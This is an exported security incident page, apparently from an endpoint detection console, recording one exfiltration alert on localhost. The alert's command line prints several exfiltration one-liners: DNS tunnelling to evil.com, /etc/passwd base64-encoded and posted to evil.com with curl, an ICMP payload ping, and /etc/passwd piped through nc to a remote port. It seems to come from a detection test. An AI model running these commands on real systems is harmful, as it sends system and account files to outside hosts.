Back to list

Medium CINC-20251220-F4ABFDD3 new

Aggregate ID: aggind:021368f9220b45cdb2760a069897c1c8:13058507540

Incident Overview

Incident ID CINC-20251220-F4ABFDD3
Severity Medium (70)
Status new
Alert Count 1
Host Count 1

Timeline

First Seen 2025-12-13 17:52:22
Last Seen 2025-12-13 17:52:22
Duration 0d 0h 0m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Exfiltration
Techniques:
Automated Exfiltration

Affected Hosts (1)

localhost.localdomain

Related Alerts (1)

Severity Status Hostname Description Tactic Command Line Time
High new localhost.localdomain The activity may be related to an adversary exfiltrating data from this host. Validate whether this data transfer is sanctioned. Exfiltration bash -c # DNS 터널링 nslookup $(cat /etc/hostname).data.evil.com 2>/dev/null || true # HTTP exfiltration cat /etc/passwd | base64 | curl -X POST -d @- http://evil.com/exfil 2>/dev/null || true # ICMP exfiltration ping -c 1 -p 7365637265745f64617461 8.8.8.8 2>/dev/null || true # NC exfiltration cat /etc/passwd | nc 10.10.10.10 9999 2>/dev/null & sleep 1 echo 'Exfiltration tests done' 12-13 17:52